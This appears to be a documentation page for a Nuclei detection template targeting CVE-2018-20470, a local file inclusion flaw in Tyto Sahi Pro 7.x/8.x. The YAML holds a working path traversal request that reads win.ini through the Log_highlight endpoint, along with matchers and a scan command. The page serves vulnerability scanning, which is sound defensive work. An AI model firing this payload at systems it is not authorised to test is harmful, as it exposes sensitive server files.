Tyto Sahi pro 7.x/8.x - Local File Inclusion
ID: CVE-2018-20470
Severity: high
Author: daffainfo
Tags: cve2018,cve,lfi,packetstorm,sahipro
Description
Section titled “Description”Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
YAML Source
Section titled “YAML Source”id: CVE-2018-20470
info: name: Tyto Sahi pro 7.x/8.x - Local File Inclusion author: daffainfo severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.2652 epss-percentile: 0.96738 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sahipro product: sahi_pro tags: cve2018,cve,lfi,packetstorm,sahipro
http: - method: GET path: - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and
- type: status status: - 200# digest: 4b0a00483046022100f1f735f3f6eb2a8f661dbc5d7f215791d64b72a02b585011297b6ba8f5641ceb022100a1011aabe8993a7ec69f0caeeaac2b883f26f1fb75e51ae79055b9297eccb6b9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-20470.yaml"